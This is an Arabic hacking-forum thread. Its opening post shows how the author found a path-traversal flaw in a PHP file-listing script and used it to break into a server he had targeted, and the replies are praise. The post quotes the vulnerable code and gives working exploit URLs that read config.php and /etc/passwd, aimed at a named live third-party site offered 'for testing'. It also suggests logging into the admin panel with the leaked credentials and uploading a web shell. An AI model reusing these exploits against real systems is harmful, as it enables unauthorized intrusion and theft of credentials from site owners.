• أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
  • بادئ الموضوع αЗѕαя
  • تاريخ البدء
الحالة
مغلق و غير مفتوح للمزيد من الردود.
DeveloPer Plus

  • إنضم
    15 ديسمبر 2011
    المشاركات
    145
    الإعجابات
    3
    النقاط
    50
    التوجّه
    white_hat
    برنامج الحماية ؟
    kaspersky
    المتصفح
    chrome
    الإقامة
    بلاد الحرمين الشريفين
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 50
    رصيدي البنكي الحالي ( 0 )
    المستوى 3
#1
السلام عليكم ورحمه الله وبركاته

كيف حالكم ان شاء الله بخير وصحه وعافيه

قبل فترة .. كنت مستهدف .. موقع على سيرفر :{6}:

بغض النظر عن اسمه s1


حاولنا يمين يسار .. لا فائده )A:"

بحثت في السكربتات .. الي موجوده في مواقع السيرفر

شفت سكربت .. مركبته أحدى المواقع

اسمه


Rapidleech PlugMod (eqbal) rev. Rev 43 Development Stage

ممتاز .. نزلته .. على السيرفر المحلي

قلنا نبحث فيه عن ثغرااات .. تفيدنا في الدخول للسيرفر &:"

نحمل هالبرنامج .. قبل كل شئ !!:{

[NOTE]
الروابط تضهر للاعضاء فقط سجل دخولك أو قم بالتسجيل الآن.
[/NOTE]
لمن لا يريد التحميل .. يبحث في قوقل !!

phpbugscanner

نفتح البرنامج




وظيفة البرنامج يبحث لك عن دوال معينة .. مو شرط اذا وجدها انها ثغره

فقد يكون الملف المصاب فيها اما ملفتر ومحمي او على مسارها هتكسس

وبالنسبة للمربع الي على اليسار فيه دوال الي يبحث عنها البرنامج في السكربت ونستغلها في اختراق السكربت

طبعا .. نقدر نضيف دوال من عندنا بالاضافه الى الدوال الموجوده




بعد ما حملنا السكربت

نفك الضغط عنه على مسار السيرفر المحلي
bl"eh"
PHP:
C:AppServwww


ممتاز

ناخذ مسار .. السكربت

ونحطه في البرنامج
&:"



وبعدها نضغط Scan



كما في الصورة اعلاه

البرنامج وظيفته اظهار جميع الدوال الموجوده فيه .. او الي التي اضفتها

الان ندخل على السكربت من المتصفح
&:"



نرجع للبرنامج ونشوف الدوال الي يمكن نستثمرها

طبعا بعد البحث و التمحص s1

لفت نظرنا هالدالة



نشوف الملف المصاب

الي هو

show_scaled_image.php

نفتحه كما هو واضح بالبرنامج السطر رقم 24 الاصابه




نشرح الموجود

PHP:
<?PHP
//dirLIST v0.3.0 image scaling file
error_reporting(0);
$image_path = '../'.rawurldecode($_GET['image_path']);

$extension = strtolower(strrchr(base****($image_path), '.'));

switch($extension)
{
    case '.jpg': header('Content-type: image/jpeg'); break;
    case '.jpeg': header('Content-type: image/jpeg'); break;
    case '.png': header('Content-type: image/png'); break;
    case '.gif': header('Content-type: image/gif'); break;
}

$image_attribs = getimagesize($image_path);

$scaled_***** = 584;
$scaled_****** = 360;

//check if image is smaller than a required dimensions of 584 x 360...in which case just show the image
if($image_attribs[0] <= $scaled_***** && $image_attribs[1] <= $scaled_******)
{
    readfile($image_path);
نلاحظ هنا

الداله readfile

PHP:
readfile($image_path);
تستدعي القيمة
PHP:
$image_path
ولانها غير ملفتره او محمية بالمعنى الاصح

فنقدر نستدعي اي ملف نبي

والقيمة $image_path معرفه في اول الملف بـ نفسها

PHP:
$image_path = '../'.rawurldecode($_GET['image_path']);
ان شاء الله اوضحت الصورة &:"

لكن حتى نقدر نرجع بالمسارات .. بالشكل المطلوب عن طريق

../../ الخ

ونعرف في اي مسار حنا .. او مسار القيمة المصابه

فلاحظنا .. انها مسبوقه بــ /.. .. كما هو واضح هنا
PHP:
$image_path = '../'.rawurldecode($_GET['image_path']);
يعني راح يكون مساري في القيمة المصابه في مجلد dirLIST_files

وليس مجلد الملف الصاب gallery_files

اي خلف المجلد المصاب

رابط الاستغلال النهائي بيكون كذا

PHP:
http://127.0.0.1/ir/Dverleech-Mod-v2.1.2-22-Mar-2012/dverleech/dirLIST_files/gallery_files/show_scaled_image.php?image_path=localfile
طبعا مثل ما ذكرت اعلاه .. مجلد ir والي بعدها. واضعها من عندي

يعني لو كان التطبيق على موقع بيكون مثل الشكل هذا

PHP:
http://127.0.0.1/path/dirLIST_files/gallery_files/show_scaled_image.php?image_path=localfile
طيب وش الي موجود ايضا في مسار المجلد هذا dirLIST_files



ملف الكونفيج config.php ممتاز نحاول نقراه

و نشوف اذا الملف مصاب فعلا ولا لأ

فيكون ناتج الاستغلال لقراء ملف الكونفيج مثل كذا

PHP:
http://127.0.0.1/ir/Dverleech-Mod-v2.1.2-22-Mar-2012/dverleech/dirLIST_files/gallery_files/show_scaled_image.php?image_path=config.php
نضعه في المتصفح



اطلعت صفحه بيضاء .. لكن صبر .. هذا الي يحصل مع استعمالنا لداله readfile بدون echo

لكن مو معناتها انه ما قراء لنا الملف

نسوي استعراض للسورس
#:"




على طول نروح للوحة التحكم الموقع المراد

ويكون مسارها كالتالي

PHP:
http://127.0.0.1/path/dirLIST_files/admin_login.php
ونضع البيانات ونرفع الشيل

او اننا .. نرفع شيل عن طريق اي مركز رفع في السكربت بصيغه jpg

وسنتعرضه عن طريق الثغره اعلاها .. كما وضحت لكم الطريقة في درس سابق

او اننا نقرا اليوزرات

الخ الخ الخ

و الثغره للامانه لم ابحث هي مكتشفها من قبل ام لأ

لكن على بحثي السريع لم اجد لها ثغره

ولله الحمد و المنه قدرت اوصل للسيرفر الي ابيه عن طريقها .. مع بعض الاضافات

و السكربت .. قد يكون مصاب بغيرها

واغلب مسارات المجلدات فيه محمية بهتكسس .. يعطيك فوربيدن حتى لو حاولت تستعرض الملف

الغرض من الموضوع

تجربة عدة طرق واساليب وبحث واختبار تطبيقات للوصول لهدفك

استغرق مني البحث و الوصول لهذه الثغره عدة ساعات .. بحكم اني افحص يدوي + الوقوف عند كل دالة .. والبحث بعض الاحيان في قوقل .. عند بعض الدوال الجديده علي

وهذه موقع لتجربة الثغره عليها

PHP:
http://www.downloadbooks.ir/dirLIST_files/gallery_files/show_scaled_image.php?image_path=config.php
http://www.downloadbooks.ir/dirLIST_files/gallery_files/show_scaled_image.php?image_path=../../../../../etc/passwd
واعذروني اذا بعض المصطلحات البرمجية .. فيها خطأ فكنت احاول ايصال المعلومه قدر الامكان &:"

اتمنى ان الموضوع افادكم ولو بشئ قليل


)5:"


 


روبورت1


<img src="http://im34.gulfup.com/s2o63.gif"><br>فر

  • إنضم
    8 نوفمبر 2012
    المشاركات
    582
    الإعجابات
    0
    النقاط
    210
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 210
    رصيدي البنكي الحالي ( 0 )
    المستوى 0
#2
عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
كتب الله لك أجر كل من استفاد منها.

* تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.
 


Developer

  • إنضم
    24 مارس 2012
    المشاركات
    66
    الإعجابات
    2
    النقاط
    30
    برنامج الحماية ؟
    kaspersky
    الإقامة
    Taif
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 2
#3
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

لاهنت يالغلا وبيض الله وجهك ~ )5:"
(( جعل والديك الجنه يارب )) قول امين ~ &:"​
 


DeveloPer Plus

  • إنضم
    5 يناير 2013
    المشاركات
    101
    الإعجابات
    8
    النقاط
    50
    نظام التشغيل
    windows_8_1
    اللغة البرمجية
    java
    التوجّه
    white_hat
    برنامج الحماية ؟
    eset_nod
    المتصفح
    firefox
    الإقامة
    Hollywood
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 50
    رصيدي البنكي الحالي ( 0 )
    المستوى 8
#4
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

وُعليكم السلآم ورحمة الله وبركاتة
وآصل يابطل + تستاهل أحلى تقييم ..
 


Developer

  • إنضم
    23 ديسمبر 2011
    المشاركات
    35
    الإعجابات
    0
    النقاط
    30
    برنامج الحماية ؟
    symantec
    المتصفح
    firefox
    الإقامة
    ™IQ-T34M
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 0
#5
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

شرح وافي وكافى من شخص مبدع
ولك خالص تحياتي :{1}:​
 


Active DeveloPer

  • إنضم
    3 نوفمبر 2012
    المشاركات
    104
    الإعجابات
    5
    النقاط
    50
    التوجّه
    none_hat
    برنامج الحماية ؟
    avast
    المتصفح
    firefox
    الإقامة
    Gaza
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 50
    رصيدي البنكي الحالي ( 0 )
    المستوى 5
#6
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

الله يعطيك الف عافيه يارب
مودتي للك يالغالي :{1}:
 


Developer

  • إنضم
    15 يناير 2012
    المشاركات
    33
    الإعجابات
    2
    النقاط
    30
    العمر
    25
    برنامج الحماية ؟
    avast
    المتصفح
    firefox
    الإقامة
    iraq-t34m
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 30
    رصيدي البنكي الحالي ( 0 )
    المستوى 2
#7
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

الله يرحم والديك عن النار ويحفظلك احبابك
مشكور اخوي
%:"​
 


MaDe IN K.s.A


<div class="smallfont"><script src="http://www.iq-
ExpErt DeveloPer

  • إنضم
    16 ديسمبر 2011
    المشاركات
    106
    الإعجابات
    1
    النقاط
    50
    التوجّه
    white_hat
    برنامج الحماية ؟
    eset_nod
    المتصفح
    firefox
    الإقامة
    ksa
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 50
    رصيدي البنكي الحالي ( 0 )
    المستوى 1
#8
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

بارك الله فيك
وجعله في ميزان حسناتك
تحياتي*:"​
 


DeveloPer Plus

  • إنضم
    22 مارس 2012
    المشاركات
    116
    الإعجابات
    7
    النقاط
    50
    برنامج الحماية ؟
    avast
    الإقامة
    مقيم في لبنان
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 50
    رصيدي البنكي الحالي ( 0 )
    المستوى 7
#9
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

مشاءالله عليك اخوي
مشكور ماقصرت وجزاك الله خير
 


DeveloPer Plus

  • إنضم
    17 ديسمبر 2011
    المشاركات
    133
    الإعجابات
    1
    النقاط
    50
    برنامج الحماية ؟
    avira
    المتصفح
    firefox
    الإقامة
    k.s.a
    آخر نشاط
  • لم يكتشف اي تلغيمه
  • لم يتحصل على جوائز بعد
  • النقاط المتوفره 50
    رصيدي البنكي الحالي ( 0 )
    المستوى 1
#10
رد: استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه

الله يعطيك الف عافية
 


استهداف سيرفرعن طريق تنزيل إحدى سكربتات مواقعه وفحصه على المحلي واكتشاف ثغره فيه
الحالة
مغلق و غير مفتوح للمزيد من الردود.